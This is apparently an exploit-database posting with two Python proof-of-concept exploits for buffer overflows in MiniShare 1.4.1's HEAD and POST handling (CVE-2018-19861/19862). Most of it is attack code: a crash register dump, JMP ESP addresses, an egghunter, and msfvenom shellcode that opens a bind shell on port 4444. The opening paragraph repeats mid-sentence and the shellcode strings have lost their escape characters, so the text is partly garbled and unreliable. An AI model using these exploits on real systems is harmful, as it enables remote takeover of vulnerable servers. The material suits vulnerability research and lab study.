Hi!!! playing in 2006.... I have adapted the exploit to python

Not only the GET method is vulnerable to BOF (CVE-2004-2271). HEAD and POST
methods are also vulnerable. The difference i Hi!!! playing in 2006.... I have adapted the exploit to python

Not only the GET method is vulnerable to BOF (CVE-2004-2271). HEAD and POST
methods are also vulnerable. The difference is minimal, both are exploited
in the same way. Only 1 byte difference: GET = 3, HEAD and POST = 4 length

-------------------------------------------------------------------

EAX 00000000
ECX 77C3EF3B msvcrt.77C3EF3B
EDX 00F14E38
EBX 43346843
ESP 01563908 ASCII
"6Ch7Ch8Ch9Ci0Ci1Ci2Ci3Ci4Ci5Ci6Ci7Ci8Ci9Cj0Cj1Cj2Cj3Cj4Cj5Cj6Cj7Cj8Cj9Ck0Ck1Ck2Ck3Ck4Ck5Ck6Ck7Ck8Ck9Cl0Cl1Cl2Cl3Cl4Cl5Cl6Cl7Cl8Cl9Cm0Cm1Cm2Cm3Cm4Cm5Cm6Cm7Cm8Cm9Cn0Cn1Cn2Cn3Cn4Cn5Cn6Cn7Cn8Cn9Co0Co1Co2Co3Co4Co5Co
HTTP/1.1
"
EBP 0156BB90
ESI 00000001
EDI 01565B68
EIP 68433568
C 0 ES 0023 32bit 0(FFFFFFFF)
P 1 CS 001B 32bit 0(FFFFFFFF)
A 1 SS 0023 32bit 0(FFFFFFFF)
Z 0 DS 0023 32bit 0(FFFFFFFF)
S 0 FS 003B 32bit 7FFDD000(FFF)
T 0 GS 0000 NULL
D 0
O 0 LastErr ERROR_SUCCESS (00000000)
EFL 00010216 (NO,NB,NE,A,NS,PE,GE,G)
ST0 empty
ST1 empty
ST2 empty
ST3 empty
ST4 empty
ST5 empty
ST6 empty
ST7 empty
3 2 1 0 E S P U O Z D I
FST 0000 Cond 0 0 0 0 Err 0 0 0 0 0 0 0 0 (GT)
FCW 027F Prec NEAR,53 Mask 1 1 1 1 1 1

------------------------------------------------------------------------------

Only 210 bytes to shellcode

------------------------------------------------------------------------------

Badchars '00','0d'

------------------------------------------------------------------------------

>findjmp kernel32.dll esp - XP SP 3 English

Scanning kernel32.dll for code useable with the esp register
0x7C809F83 call esp
0x7C8369E0 call esp
0x7C83C2C5 push esp - ret
0x7C87641B call esp


<!--
# Exploit Title: Buffer overflow in MiniShare 1.4.1 HEAD method.
# Date: 05-12-2018
# Exploit Author: Rafael Pedrero
# Vendor Homepage: http://minishare.sourceforge.net/
# Software Link: http://minishare.sourceforge.net/
# Version: Minishare v1.4.1
# Tested on: Windows
# CVE : CVE-2018-19861
# Category: exploit

1. Description

Buffer overflow in MiniShare 1.4.1 and earlier allows remote attackers to
execute arbitrary code via a long HTTP HEAD request.


2. Proof of Concept

Exploit:

#!/usr/bin/env python
import socket
import struct
import os

# Buffer overflow in MiniShare 1.4.1 and earlier allows remote attackers to
execute arbitrary code via a long HTTP HEAD request - by Rafa
# CVE: CVE-2018-19861
# Via Egghunter because shellcode in ESP only 210 bytes long.
# Project Home Page (MiniShare) - http://minishare.sourceforge.net/
connection=socket.socket(socket.AF_INET, socket.SOCK_STREAM)
host = "127.0.0.1"
port = 80

# 32 bytes Egghunter - Egg = r4f4 = x72x34x66x34
egghunter =
"x66x81xcaxffx0fx42x52x6ax02x58xcdx2ex3cx05x5ax74xefxb8x72x34x66x34x8bxfaxafx75xeaxafx75xe7xffxe7"

#msfvenom -a x86 --platform Windows -p windows/shell_bind_tcp LPORT=4444 -f
python -a x86 --platform windows -b "x00x0d" -f c
#Found 10 compatible encoders
#Attempting to encode payload with 1 iterations of x86/shikata_ga_nai
#x86/shikata_ga_nai succeeded with size 355 (iteration=0)
#x86/shikata_ga_nai chosen with final size 355
#Payload size: 355 bytes
#Final size of c file: 1516 bytes
#unsigned char buf[] =
shellcode=("r4f4r4f4"+"xdaxd4xb8xdaxe7x1bxcaxd9x74x24xf4x5ax31xc9xb1"
"x53x83xeaxfcx31x42x13x03x98xf4xf9x3fxe0x13x7f"
"xbfx18xe4xe0x49xfdxd5x20x2dx76x45x91x25xdax6a"
"x5ax6bxcexf9x2exa4xe1x4ax84x92xccx4bxb5xe7x4f"
"xc8xc4x3bxafxf1x06x4exaex36x7axa3xe2xefxf0x16"
"x12x9bx4dxabx99xd7x40xabx7exafx63x9axd1xbbx3d"
"x3cxd0x68x36x75xcax6dx73xcfx61x45x0fxcexa3x97"
"xf0x7dx8ax17x03x7fxcbx90xfcx0ax25xe3x81x0cxf2"
"x99x5dx98xe0x3ax15x3axccxbbxfaxddx87xb0xb7xaa"
"xcfxd4x46x7ex64xe0xc3x81xaax60x97xa5x6ex28x43"
"xc7x37x94x22xf8x27x77x9ax5cx2cx9axcfxecx6fxf3"
"x3cxddx8fx03x2bx56xfcx31xf4xccx6ax7ax7dxcbx6d"
"x7dx54xabxe1x80x57xccx28x47x03x9cx42x6ex2cx77"
"x92x8fxf9xe2x9ax36x52x11x67x88x02x95xc7x61x49"
"x1ax38x91x72xf0x51x3ax8fxfbx4cxe7x06x1dx04x07"
"x4fxb5xb0xe5xb4x0ex27x15x9fx26xcfx5exc9xf1xf0"
"x5exdfx55x66xd5x0cx62x97xeax18xc2xc0x7dxd6x83"
"xa3x1cxe7x89x53xbcx7ax56xa3xcbx66xc1xf4x9cx59"
"x18x90x30xc3xb2x86xc8x95xfdx02x17x66x03x8bxda"
"xd2x27x9bx22xdax63xcfxfax8dx3dxb9xbcx67x8cx13"
"x17xdbx46xf3xeex17x59x85xeex7dx2fx69x5ex28x76"
"x96x6fxbcx7exefx8dx5cx80x3ax16x6cxcbx66x3fxe5"
"x92xf3x7dx68x25x2ex41x95xa6xdax3ax62xb6xafx3f"
"x2ex70x5cx32x3fx15x62xe1x40x3c")

# findjmp kernel32.dll esp - WinXP SP3 English
#0x7C809F83 call esp

nops = "x90" * 16

junk = "A" * 1786 + "x83x9fx80x7c" + nops + egghunter + "C" * (2000 -
1786 - 4 - 16 - len(egghunter))

try:
print "Sending exploit..."
connection.connect((host,port))
buffer = (
"HEAD " + junk + " HTTP/1.1 "
"Host: " + shellcode + " ")

connection.send(buffer)
connection.close()
print " Exploit Sended ", len(buffer)
except:
print "Connection error"



3. Solution:

This product is deprecated

-->


<!--
# Exploit Title: Buffer overflow in MiniShare 1.4.1 POST method.
# Date: 05-12-2018
# Exploit Author: Rafael Pedrero
# Vendor Homepage: http://minishare.sourceforge.net/
# Software Link: http://minishare.sourceforge.net/
# Version: Minishare v1.4.1
# Tested on: Windows
# CVE : CVE-2018-19862
# Category: exploit

1. Description

Buffer overflow in MiniShare 1.4.1 and earlier allows remote attackers to
execute arbitrary code via a long HTTP POST request.


2. Proof of Concept

Exploit:

#!/usr/bin/env python
import socket
import struct
import os

# Buffer overflow in MiniShare 1.4.1 and earlier allows remote attackers to
execute arbitrary code via a long HTTP POST request - by Rafa
# CVE: CVE-2018-19862
# Via Egghunter because shellcode in ESP only 210 bytes long.
# Project Home Page (MiniShare) - http://minishare.sourceforge.net/
connection=socket.socket(socket.AF_INET, socket.SOCK_STREAM)
host = "127.0.0.1"
port = 80

# 32 bytes Egghunter - Egg = r4f4 = x72x34x66x34
egghunter =
"x66x81xcaxffx0fx42x52x6ax02x58xcdx2ex3cx05x5ax74xefxb8x72x34x66x34x8bxfaxafx75xeaxafx75xe7xffxe7"

#msfvenom -a x86 --platform Windows -p windows/shell_bind_tcp LPORT=4444 -f
python -a x86 --platform windows -b "x00x0d" -f c
#Found 10 compatible encoders
#Attempting to encode payload with 1 iterations of x86/shikata_ga_nai
#x86/shikata_ga_nai succeeded with size 355 (iteration=0)
#x86/shikata_ga_nai chosen with final size 355
#Payload size: 355 bytes
#Final size of c file: 1516 bytes
#unsigned char buf[] =
shellcode=("r4f4r4f4"+"xdaxd4xb8xdaxe7x1bxcaxd9x74x24xf4x5ax31xc9xb1"
"x53x83xeaxfcx31x42x13x03x98xf4xf9x3fxe0x13x7f"
"xbfx18xe4xe0x49xfdxd5x20x2dx76x45x91x25xdax6a"
"x5ax6bxcexf9x2exa4xe1x4ax84x92xccx4bxb5xe7x4f"
"xc8xc4x3bxafxf1x06x4exaex36x7axa3xe2xefxf0x16"
"x12x9bx4dxabx99xd7x40xabx7exafx63x9axd1xbbx3d"
"x3cxd0x68x36x75xcax6dx73xcfx61x45x0fxcexa3x97"
"xf0x7dx8ax17x03x7fxcbx90xfcx0ax25xe3x81x0cxf2"
"x99x5dx98xe0x3ax15x3axccxbbxfaxddx87xb0xb7xaa"
"xcfxd4x46x7ex64xe0xc3x81xaax60x97xa5x6ex28x43"
"xc7x37x94x22xf8x27x77x9ax5cx2cx9axcfxecx6fxf3"
"x3cxddx8fx03x2bx56xfcx31xf4xccx6ax7ax7dxcbx6d"
"x7dx54xabxe1x80x57xccx28x47x03x9cx42x6ex2cx77"
"x92x8fxf9xe2x9ax36x52x11x67x88x02x95xc7x61x49"
"x1ax38x91x72xf0x51x3ax8fxfbx4cxe7x06x1dx04x07"
"x4fxb5xb0xe5xb4x0ex27x15x9fx26xcfx5exc9xf1xf0"
"x5exdfx55x66xd5x0cx62x97xeax18xc2xc0x7dxd6x83"
"xa3x1cxe7x89x53xbcx7ax56xa3xcbx66xc1xf4x9cx59"
"x18x90x30xc3xb2x86xc8x95xfdx02x17x66x03x8bxda"
"xd2x27x9bx22xdax63xcfxfax8dx3dxb9xbcx67x8cx13"
"x17xdbx46xf3xeex17x59x85xeex7dx2fx69x5ex28x76"
"x96x6fxbcx7exefx8dx5cx80x3ax16x6cxcbx66x3fxe5"
"x92xf3x7dx68x25x2ex41x95xa6xdax3ax62xb6xafx3f"
"x2ex70x5cx32x3fx15x62xe1x40x3c")

# findjmp kernel32.dll esp - WinXP SP3 English
#0x7C809F83 call esp

nops = "x90" * 16

junk = "A" * 1786 + "x83x9fx80x7c" + nops + egghunter + "C" * (2000 -
1786 - 4 - 16 - len(egghunter))

try:
print "Sending exploit..."
connection.connect((host,port))

buffer = (
"POST " + junk + " HTTP/1.1 "
"Host: " + shellcode + " ")

connection.send(buffer)
connection.close()
print " Exploit Sended ", len(buffer)
except:
print "Connection error"



3. Solution:

This product is deprecated

-->